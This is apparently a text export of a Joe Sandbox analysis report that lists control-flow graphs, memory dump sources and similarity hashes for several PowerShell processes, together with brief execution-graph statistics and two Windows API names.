                                                                                                                                control_flow_graph 209 7ffb4b296dfb-7ffb4b296edf SetProcessWorkingSetSizeEx 216 7ffb4b296ee7-7ffb4b296f0f 209->216 217 7ffb4b296ee1 209->217 217->216
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1527610873.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b290000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProcessSizeWorking
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3584180929-0
                                                                                                                                • Opcode ID: f6d66580fd6cf752bc01144d30f6d66dddb1efb7e6d073f8c51ad4850d9af920
                                                                                                                                • Instruction ID: ba8f3d479829acd3975e0181f7b604cb0c908331337aebe9297eef7f280f09a4
                                                                                                                                • Opcode Fuzzy Hash: f6d66580fd6cf752bc01144d30f6d66dddb1efb7e6d073f8c51ad4850d9af920
                                                                                                                                • Instruction Fuzzy Hash: B4312671A0CB584FD719EF6CD8456F97FE0EB66321F00417FD189C3192DA206906C791

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 297 7ffb4b3651ba-7ffb4b3651bf 298 7ffb4b365201-7ffb4b365244 297->298 299 7ffb4b3651c1-7ffb4b3651d9 297->299 307 7ffb4b3654ac-7ffb4b36556b 298->307 308 7ffb4b36524a-7ffb4b365254 298->308 301 7ffb4b36515c-7ffb4b365164 299->301 302 7ffb4b3651db-7ffb4b3651fa 299->302 305 7ffb4b365170-7ffb4b3651b0 301->305 306 7ffb4b365166-7ffb4b36516f 301->306 302->298 305->297 310 7ffb4b36526d-7ffb4b365272 308->310 311 7ffb4b365256-7ffb4b365263 308->311 314 7ffb4b365450-7ffb4b36545a 310->314 315 7ffb4b365278-7ffb4b36527b 310->315 311->310 319 7ffb4b365265-7ffb4b36526b 311->319 317 7ffb4b36545c-7ffb4b365468 314->317 318 7ffb4b365469-7ffb4b3654a9 314->318 320 7ffb4b365292 315->320 321 7ffb4b36527d-7ffb4b365290 315->321 318->307 319->310 326 7ffb4b365294-7ffb4b365296 320->326 321->326 326->314 327 7ffb4b36529c-7ffb4b3652d0 326->327 340 7ffb4b3652d2-7ffb4b3652e5 327->340 341 7ffb4b3652e7 327->341 343 7ffb4b3652e9-7ffb4b3652eb 340->343 341->343 343->314 345 7ffb4b3652f1-7ffb4b3652f9 343->345 345->307 346 7ffb4b3652ff-7ffb4b365309 345->346 348 7ffb4b36530b-7ffb4b365323 346->348 349 7ffb4b365325-7ffb4b365335 346->349 348->349 349->314 353 7ffb4b36533b-7ffb4b36536c 349->353 353->314 359 7ffb4b365372-7ffb4b36539e 353->359 364 7ffb4b3653a0-7ffb4b3653c6 359->364 365 7ffb4b3653c9-7ffb4b3653cd 359->365 364->365 365->314 366 7ffb4b3653d3-7ffb4b3653db 365->366 368 7ffb4b3653eb 366->368 369 7ffb4b3653dd-7ffb4b3653e7 366->369 372 7ffb4b3653f0-7ffb4b365405 368->372 370 7ffb4b365407-7ffb4b365426 369->370 371 7ffb4b3653e9 369->371 376 7ffb4b365430-7ffb4b365436 370->376 371->372 372->370 377 7ffb4b36543d-7ffb4b36544f 376->377
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c9a93c3fa6243ba583504e2b43257301d0be99748adb0d831f711b7fc296d6ba
                                                                                                                                • Instruction ID: 929eb4b96671530313427a81201e26f87c4e8f45d54d2d9ab93304ffc1064687
                                                                                                                                • Opcode Fuzzy Hash: c9a93c3fa6243ba583504e2b43257301d0be99748adb0d831f711b7fc296d6ba
                                                                                                                                • Instruction Fuzzy Hash: 35D176B2A1DA8D0FE7A6EF7DC8156B97BD1EF65314B1800FED54CC70A3D918A8058391

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 452 7ffb4b361e8a-7ffb4b361ebb 456 7ffb4b361ec2-7ffb4b361ed3 452->456 457 7ffb4b361ebd 452->457 459 7ffb4b361eda-7ffb4b361eeb 456->459 460 7ffb4b361ed5 456->460 457->456 458 7ffb4b361ebf 457->458 458->456 462 7ffb4b361ef2-7ffb4b361f7f 459->462 463 7ffb4b361eed 459->463 460->459 461 7ffb4b361ed7 460->461 461->459 468 7ffb4b362140-7ffb4b3621f5 462->468 469 7ffb4b361f85-7ffb4b361f8f 462->469 463->462 464 7ffb4b361eef 463->464 464->462 470 7ffb4b361f91-7ffb4b361fa1 469->470 471 7ffb4b361fa8-7ffb4b361fac 469->471 476 7ffb4b361fc0 470->476 477 7ffb4b361fa3-7ffb4b361fa6 470->477 474 7ffb4b361fb2-7ffb4b361fb5 471->474 475 7ffb4b3620e8-7ffb4b3620f2 471->475 478 7ffb4b361fcc-7ffb4b361fd0 474->478 479 7ffb4b361fb7-7ffb4b361fbe 474->479 480 7ffb4b3620ff-7ffb4b36213d 475->480 481 7ffb4b3620f4-7ffb4b3620fe 475->481 476->478 477->471 478->475 485 7ffb4b361fd6-7ffb4b36200d 478->485 479->476 480->468 497 7ffb4b36200f-7ffb4b36202f 485->497 498 7ffb4b362031 485->498 499 7ffb4b362033-7ffb4b362035 497->499 498->499 499->475 502 7ffb4b36203b-7ffb4b362075 499->502 509 7ffb4b36208e-7ffb4b3620be 502->509 510 7ffb4b362077-7ffb4b362084 502->510 517 7ffb4b3620c0-7ffb4b3620cc 509->517 510->509 513 7ffb4b362086-7ffb4b36208c 510->513 513->509 518 7ffb4b3620d3-7ffb4b3620e7 517->518
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0351d94f6ccce686e82b6be59b7063787231af303218162b85512055b65ac4f8
                                                                                                                                • Instruction ID: 6b7912ceb2d493f317293d10753e23dd448c5c8f55180812f32728d0b5c784ec
                                                                                                                                • Opcode Fuzzy Hash: 0351d94f6ccce686e82b6be59b7063787231af303218162b85512055b65ac4f8
                                                                                                                                • Instruction Fuzzy Hash: F4C135A190EA8A1FE766EE7D8C542A57FE0EF56310F0541FFD58CCB0A3DA185849C391

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 519 7ffb4b360afe-7ffb4b360b10 521 7ffb4b360cc1-7ffb4b360ccb 519->521 522 7ffb4b360b16-7ffb4b360b1e 519->522 525 7ffb4b360cdc-7ffb4b360db3 521->525 526 7ffb4b360ccd-7ffb4b360cdb 521->526 523 7ffb4b360b20-7ffb4b360b2a 522->523 524 7ffb4b360b2e 522->524 527 7ffb4b360b2c 523->527 528 7ffb4b360b4a-7ffb4b360b7a 523->528 530 7ffb4b360b33-7ffb4b360b48 524->530 561 7ffb4b360dba-7ffb4b360dcb 525->561 562 7ffb4b360db5 525->562 527->530 528->524 536 7ffb4b360b7c-7ffb4b360b86 528->536 530->528 538 7ffb4b360b9f-7ffb4b360c00 536->538 539 7ffb4b360b88-7ffb4b360b9d 536->539 551 7ffb4b360c02-7ffb4b360c13 538->551 552 7ffb4b360c14-7ffb4b360c52 538->552 539->538 551->552 563 7ffb4b360c6b-7ffb4b360c9a 552->563 564 7ffb4b360c54-7ffb4b360c69 552->564 566 7ffb4b360dd2-7ffb4b360e69 561->566 567 7ffb4b360dcd 561->567 562->561 565 7ffb4b360db7 562->565 585 7ffb4b360ca1-7ffb4b360cc0 563->585 564->563 565->561 576 7ffb4b361140-7ffb4b3611b6 566->576 577 7ffb4b360e6f-7ffb4b360e79 566->577 567->566 571 7ffb4b360dcf 567->571 571->566 604 7ffb4b3611b7-7ffb4b3611cf 576->604 579 7ffb4b360e92-7ffb4b360e97 577->579 580 7ffb4b360e7b-7ffb4b360e90 577->580 583 7ffb4b3610dd-7ffb4b3610e7 579->583 584 7ffb4b360e9d-7ffb4b360ea0 579->584 580->579 589 7ffb4b3610f8-7ffb4b36113d 583->589 590 7ffb4b3610e9-7ffb4b3610f7 583->590 587 7ffb4b360ea2-7ffb4b360eab 584->587 588 7ffb4b360eb7-7ffb4b360ebb 584->588 587->588 588->583 595 7ffb4b360ec1-7ffb4b360ef8 588->595 589->576 607 7ffb4b360f1c 595->607 608 7ffb4b360efa-7ffb4b360f0d 595->608 611 7ffb4b3611d1 604->611 612 7ffb4b3611d6-7ffb4b3611e7 604->612 610 7ffb4b360f1e-7ffb4b360f20 607->610 614 7ffb4b360f24-7ffb4b360f29 608->614 622 7ffb4b360f0f-7ffb4b360f1a 608->622 610->583 610->614 611->612 615 7ffb4b3611d3 611->615 616 7ffb4b3611ee-7ffb4b36120a 612->616 617 7ffb4b3611e9 612->617 614->583 619 7ffb4b360f2f-7ffb4b360f3a 
614->619 615->612 616->604 621 7ffb4b36120c-7ffb4b361284 616->621 617->616 620 7ffb4b3611eb 617->620 623 7ffb4b360f3c-7ffb4b360f46 619->623 624 7ffb4b360f4a 619->624 620->616 636 7ffb4b36144b-7ffb4b3614dd 621->636 637 7ffb4b36128a-7ffb4b361294 621->637 622->610 626 7ffb4b360f48 623->626 627 7ffb4b360f66-7ffb4b360f76 623->627 628 7ffb4b360f4f-7ffb4b360f64 624->628 626->628 632 7ffb4b360f78-7ffb4b360f81 627->632 633 7ffb4b360f83-7ffb4b360f8c 627->633 628->627 632->633 633->583 670 7ffb4b3614e0-7ffb4b3614f1 636->670 671 7ffb4b3614df 636->671 640 7ffb4b3612ad-7ffb4b3612b2 637->640 641 7ffb4b361296-7ffb4b3612a3 637->641 643 7ffb4b3613eb-7ffb4b3613f5 640->643 644 7ffb4b3612b8-7ffb4b3612bb 640->644 641->640 651 7ffb4b3612a5-7ffb4b3612ab 641->651 649 7ffb4b3613f7-7ffb4b361403 643->649 650 7ffb4b361404-7ffb4b361448 643->650 647 7ffb4b3612d2-7ffb4b3612d6 644->647 648 7ffb4b3612bd-7ffb4b3612c6 644->648 647->643 656 7ffb4b3612dc-7ffb4b361313 647->656 648->647 650->636 651->640 668 7ffb4b361337 656->668 669 7ffb4b361315-7ffb4b361335 656->669 672 7ffb4b361339-7ffb4b36133b 668->672 669->672 673 7ffb4b3614f4-7ffb4b3615b1 670->673 674 7ffb4b3614f3 670->674 671->670 672->643 676 7ffb4b361341-7ffb4b36137f 672->676 674->673 688 7ffb4b361381-7ffb4b361396 676->688 689 7ffb4b361398-7ffb4b3613c6 676->689 688->689 695 7ffb4b3613cd-7ffb4b3613ea 689->695
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 380ebea329f492668ecc6236eda4433881b7fe64d802b3b161ce98afdd689ca2
                                                                                                                                • Instruction ID: 0445b6106de98cae1f74908918ff91a7ea602b1c0243551a812d3e528f00e8fb
                                                                                                                                • Opcode Fuzzy Hash: 380ebea329f492668ecc6236eda4433881b7fe64d802b3b161ce98afdd689ca2
                                                                                                                                • Instruction Fuzzy Hash: 2F513BB2A0DA854FE3A5EF3DC49627477C2EF95315B1481BED18DC71A2ED289C468381

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 697 7ffb4b360f98-7ffb4b360fa5 698 7ffb4b360fbe-7ffb4b36101f 697->698 699 7ffb4b360fa7-7ffb4b360fbd 697->699 706 7ffb4b361021-7ffb4b36102f 698->706 707 7ffb4b361033-7ffb4b361070 698->707 699->698 706->707 710 7ffb4b361031-7ffb4b361032 706->710 714 7ffb4b361072-7ffb4b361087 707->714 715 7ffb4b361089-7ffb4b3610b7 707->715 710->707 714->715 721 7ffb4b3610be-7ffb4b3610dc 715->721
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5a023aca343853d9d26fa2f2047d55adc35cf12ae90648b290b16b6bac674dd9
                                                                                                                                • Instruction ID: 15513f073244d0faef1600aa83dd0db843010d1882989143c105e4140b1bf826
                                                                                                                                • Opcode Fuzzy Hash: 5a023aca343853d9d26fa2f2047d55adc35cf12ae90648b290b16b6bac674dd9
                                                                                                                                • Instruction Fuzzy Hash: D94104B2E0DFC60FE7A9EE3D84522B4AAD1EF95350B1840BED18DC71A2DD28AC458741

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 723 7ffb4b3628bd-7ffb4b362924 729 7ffb4b36292b-7ffb4b362939 723->729 731 7ffb4b362941 729->731 732 7ffb4b36293b 729->732 733 7ffb4b362943 731->733 734 7ffb4b362945-7ffb4b362990 731->734 732->731 733->734 736 7ffb4b362992-7ffb4b3629ba 734->736 737 7ffb4b3629bb-7ffb4b3629fb 734->737 736->737
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 77e842aff67eca295ec5447d57cc93aec49ac9b43158e075d5dab9700b706275
                                                                                                                                • Instruction ID: a65b745b6b84071308e42c7463e8a6b0eb8b208dfb49eb2647de56c3c741f27a
                                                                                                                                • Opcode Fuzzy Hash: 77e842aff67eca295ec5447d57cc93aec49ac9b43158e075d5dab9700b706275
                                                                                                                                • Instruction Fuzzy Hash: D34107A290E7C54FE767AF798C661657FE19F53214B0E44FED0C88B0E3D8191805C722

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd

Control-flow Graph
Memory Dump Source
• Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd

Control-flow Graph
Memory Dump Source
• Source File: 00000009.00000002.1528496279.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffb4b360000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622844642.00007FFB4B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b350000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622200380.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b280000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1622200380.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffb4b280000_powershell.jbxd
Memory Dump Source
• Source File: 0000000E.00000002.1733990054.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffb4b290000_powershell.jbxd
Memory Dump Source
• Source File: 00000011.00000002.1937428802.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffb4b290000_powershell.jbxd
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.2141920185.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffb4b370000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 189f59a84af9c3fdbd2b57173586a6c8ff5eddd5cb1557754d650e1322a39c19
                                                                                                                                • Instruction ID: 8ce79f87bf92eb7835d63c4e581a9feafdea8d152798f8afd20070aa0db3810d
                                                                                                                                • Opcode Fuzzy Hash: 189f59a84af9c3fdbd2b57173586a6c8ff5eddd5cb1557754d650e1322a39c19
                                                                                                                                • Instruction Fuzzy Hash: E7D137A290EAC95FE796EE79C8555B5BBE1FF06310F0480FED58CC71A3D918A806C351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.2141920185.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffb4b370000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f1e43ee45536d0fb724deff826af3d68883920f2aaf05100e10bcd46f546f32e
                                                                                                                                • Instruction ID: cd85522ccbb9de35e31e6a25879dc449e85d4084ceecc1537edad4b830bc9601
                                                                                                                                • Opcode Fuzzy Hash: f1e43ee45536d0fb724deff826af3d68883920f2aaf05100e10bcd46f546f32e
                                                                                                                                • Instruction Fuzzy Hash: 0C41F3A3A0EBC90FE793ABB99C641647FE1EF56210B1941FBC588CB1E3ED095C098351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.2140429528.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffb4b2a0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                • Instruction ID: 186b34d52dba661874ab005c2c59546416dfff876fe24ff70b810a5e087d0383
                                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                • Instruction Fuzzy Hash: E101677111CB0D8FD784EF0CE451AA6B7E0FB99364F10056EE58AC3661D636E892CB45
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000015.00000002.2231773242.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_21_2_7ffb4b390000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e4a2cb553ad857fd5aba9935ec04960a7ec1cac7864e0d4da2ec90975a838653
                                                                                                                                • Instruction ID: 67b15b27be588b36c93f5e999d5152daa8235a3d58b3db80df7a26321f73322c
                                                                                                                                • Opcode Fuzzy Hash: e4a2cb553ad857fd5aba9935ec04960a7ec1cac7864e0d4da2ec90975a838653
                                                                                                                                • Instruction Fuzzy Hash: E5F156A290EAC96FE7A6FF7988555B5BFF1EF06210B0840FAD18CC71A3D918AC15C351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000015.00000002.2230585931.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_21_2_7ffb4b2c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                • Instruction ID: 313ade0db2935ec4731d5d2cf415f488d4ef165f7f5db495c15e952234dacecf
                                                                                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                • Instruction Fuzzy Hash: A401677111CB0C8FD784EF0CE451AA6B7E0FB95364F10066EE58AC3665D636E892CB45

                                                                                                                                Execution Graph

                                                                                                                                 Execution Coverage: 4%
                                                                                                                                 Dynamic/Decrypted Code Coverage: 0%
                                                                                                                                 Signature Coverage: 0%
                                                                                                                                 Total number of Nodes: 3
                                                                                                                                 Total number of Limit Nodes: 0
                                                                                                                                 execution_graph (node: address, then successors)
                                                                                                                                 • 5605: 7ffb4e7fd754 -> 5606
                                                                                                                                 • 5606: 7ffb4e7fd75d LoadLibraryExW -> 5608
                                                                                                                                 • 5608: 7ffb4e7fd80d (no successors)

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000023.00000002.2680667553.00007FFB4E7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4E7F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_35_2_7ffb4e7f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                • Opcode ID: 705c15a00e388b793f31e3409945d21dd4bdb5de9ad77e4da542b5cf2e0ac2ac
                                                                                                                                • Instruction ID: f48859456c68a6d8da25a4cb004aff5bbfdc235a3940cf215acd70760f5a08fe
                                                                                                                                • Opcode Fuzzy Hash: 705c15a00e388b793f31e3409945d21dd4bdb5de9ad77e4da542b5cf2e0ac2ac
                                                                                                                                • Instruction Fuzzy Hash: 3331C17190CA4C9FDB19EFA8C849BE9BBE0FF55321F04822BD009D3551DB74A816CB91

                                                                                                                                 Control-flow Graph

                                                                                                                                 Legend of the rendered graph: Executed / Not Executed (per-block colouring is not recoverable in this text export)
                                                                                                                                 control_flow_graph (node: address range, then successors)
                                                                                                                                 • 9: 7ffb4e8c2fca-7ffb4e8c2fcf -> 10, 11
                                                                                                                                 • 10: 7ffb4e8c3011-7ffb4e8c3028 -> 14, 15
                                                                                                                                 • 11: 7ffb4e8c2fd1-7ffb4e8c2feb -> 12, 13
                                                                                                                                 • 12: 7ffb4e8c2fed-7ffb4e8c300f -> 10
                                                                                                                                 • 13: 7ffb4e8c2fbf -> 9
                                                                                                                                 • 14: 7ffb4e8c302a-7ffb4e8c3054 -> 23, 24
                                                                                                                                 • 15: 7ffb4e8c305d-7ffb4e8c3064 -> 18, 19
                                                                                                                                 • 18: 7ffb4e8c3066-7ffb4e8c3073 -> 19, 28
                                                                                                                                 • 19: 7ffb4e8c307d-7ffb4e8c3082 -> 20, 21
                                                                                                                                 • 20: 7ffb4e8c3088-7ffb4e8c308b -> 26, 27
                                                                                                                                 • 21: 7ffb4e8c3260-7ffb4e8c326a -> 29, 30
                                                                                                                                 • 23: 7ffb4e8c305a-7ffb4e8c305b -> 15
                                                                                                                                 • 24: 7ffb4e8c32bc-7ffb4e8c337b (no successors)
                                                                                                                                 • 26: 7ffb4e8c308d-7ffb4e8c30a0 -> 32
                                                                                                                                 • 27: 7ffb4e8c30a2 -> 32
                                                                                                                                 • 28: 7ffb4e8c3075-7ffb4e8c307b -> 19
                                                                                                                                 • 29: 7ffb4e8c3279-7ffb4e8c32b9 -> 24
                                                                                                                                 • 30: 7ffb4e8c326c-7ffb4e8c3278 (no successors)
                                                                                                                                 • 32: 7ffb4e8c30a4-7ffb4e8c30a6 -> 21, 35
                                                                                                                                 • 35: 7ffb4e8c30ac-7ffb4e8c30e0 -> 47, 48
                                                                                                                                 • 47: 7ffb4e8c30f7 -> 52
                                                                                                                                 • 48: 7ffb4e8c30e2-7ffb4e8c30f5 -> 52
                                                                                                                                 • 52: 7ffb4e8c30f9-7ffb4e8c30fb -> 21, 53
                                                                                                                                 • 53: 7ffb4e8c3101-7ffb4e8c3109 -> 24, 54
                                                                                                                                 • 54: 7ffb4e8c310f-7ffb4e8c3119 -> 56, 57
                                                                                                                                 • 56: 7ffb4e8c3135-7ffb4e8c3145 -> 21, 62
                                                                                                                                 • 57: 7ffb4e8c311b-7ffb4e8c3133 -> 56
                                                                                                                                 • 62: 7ffb4e8c314b-7ffb4e8c317c -> 21, 68
                                                                                                                                 • 68: 7ffb4e8c3182-7ffb4e8c31ae -> 73, 74
                                                                                                                                 • 73: 7ffb4e8c31d9 -> 75
                                                                                                                                 • 74: 7ffb4e8c31b0-7ffb4e8c31d7 -> 75
                                                                                                                                 • 75: 7ffb4e8c31db-7ffb4e8c31dd -> 21, 77
                                                                                                                                 • 77: 7ffb4e8c31e3-7ffb4e8c31eb -> 78, 79
                                                                                                                                 • 78: 7ffb4e8c31ed-7ffb4e8c31f7 -> 80, 81
                                                                                                                                 • 79: 7ffb4e8c31fb -> 83
                                                                                                                                 • 80: 7ffb4e8c31f9 -> 83
                                                                                                                                 • 81: 7ffb4e8c3217-7ffb4e8c3239 -> 87
                                                                                                                                 • 83: 7ffb4e8c3200-7ffb4e8c3215 -> 81
                                                                                                                                 • 87: 7ffb4e8c3240-7ffb4e8c3246 -> 88
                                                                                                                                 • 88: 7ffb4e8c324d-7ffb4e8c325f (no successors)
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000023.00000002.2683287150.00007FFB4E8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4E8C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_35_2_7ffb4e8c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7dfceb0aaa7ef205550cdb39d4c8ac1adad94abc02ae62dd78af804b44b4eaee
